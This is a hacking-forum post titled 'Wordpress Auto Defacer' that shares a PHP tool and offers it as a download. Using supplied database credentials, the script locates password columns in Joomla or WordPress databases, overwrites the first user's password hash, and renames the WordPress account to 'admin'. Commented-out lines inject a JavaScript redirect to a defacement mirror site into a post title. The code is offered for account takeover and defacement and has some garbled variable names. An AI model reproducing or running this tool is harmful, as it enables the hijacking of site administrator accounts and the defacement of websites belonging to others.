Jump to content
io.kent

Wordpress Auto Defacer + Threads

Recommended Posts

Posted



query.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Exploit query 2011 #</title>
</head>
<style type="text/css">
body{
background: #333333;
color: #fff;
font-family: Consolas;
font-size: 13px;

}
.text {
background: #fff;
color: #000;
}
.text:hover {
background: #FFFFCC;
}

.submit {
background: #333330;
padding: 2px;
margin: 0px;
color: #fff;
border: thick;
}
.submit:hover {
background: #555;
}

</style>
<body>
<center><h2># Mysql Query #</h2>
<form action="" method="post">
host : <input type="text" value="localhost" name="localhost" class="text" />  
db  :  <input type="text" name="db" class="text" /><br />
user : <input type="text" name="userdb" class="text" />   pass : <input type="text" name="passdb" class="text" /><br /> <br />What password ! : <input type="text" name="mdpass" class="text" /><br />
joomla : <input type="radio" value="1" name="ch1" /> wordpress: <input type="radio" value="2" name="ch1" /> <br /> <br />

<input type="submit" name ="go" value="#- Done -#" class="submit" />


</form>

</center>
<?

$host = $_POST['locch1alhost'];
$dbname = $_POST['db'];
$dbuser = $_POST['userdb'];
$dbpass = $_POST['passdb'];
$kolk = md5($_POST['mdpass']);
if ($_POST['ch1'] == 1) {


$connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database");
$selectdb = mysql_select_db($dbname,$connect);

$cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_sche ma) from information_schema.columns where column_name LIKE "%pas%"');
$show = mysql_fetch_array($cyber);
$defg = $show[0];
$imp = explode(':',$defg);
$ar = $imp[0];

$conar = mysql_query("SELECT * FROM $ar");
$showar = mysql_fetch_array($conar);

################# set
$setar = mysql_query("UPDATE $ar SET password='".$kolk."' WHERE id = '".$showar[0]."' ");
echo $setar;
echo "user name is -> $showar[2]";
} else if ($_POST['ch1'] == '2') {

$connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database");
$selectdb = mysql_select_db($dbname,$connect);

$cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_sche ma) from information_schema.columns where column_name LIKE "%user_pass%"');
$show = mysql_fetch_array($cyber);
$defg = $show[0];
$imp = explode(':',$defg);
$ar = $imp[0];

$conar = mysql_query("SELECT * FROM $ar");
$showar = mysql_fetch_array($conar);

################# set
$setar = mysql_query("UPDATE $ar SET user_pass='".$kolk."' WHERE id = '".$showar[0]."' ");
$setar .= mysql_query("UPDATE $ar SET user_login='admin' WHERE id = '".$showar[0]."' ");
echo $setar;
echo "user name is -> $showar[1]"."<br />";
#$qurl = mysql_query("select guid from wp_posts");
#$scr = "<script>document.location='http://zonehmirrors.net/defaced/2011/10/07/ecocolourchembd.com'</script>";
#$indq = mysql_query('UPDATE wp_posts SET post_title="'.$scr.'" WHERE id =1');
#$indexar = mysql_fetch_array($indq);
#$qin = mysql_query("select post_title from wp_posts where id =1");
#$rqin = mysql_fetch_array($qin);
# echo htmlspecialchars("$rqin[0]");
$q = mysql_query("select * from wp_options where option_id='1' or option_name='home'");
while($wos = mysql_fetch_object($q)){
if ($wos){
echo "URL : ~> ".$wos->option_value."<br>";
}}
}
?>
</body>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<center><b>Meked By Cyber-Crystal </b></center>
</html>



Download Tool: "wpdef" Download wpdef.rar

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...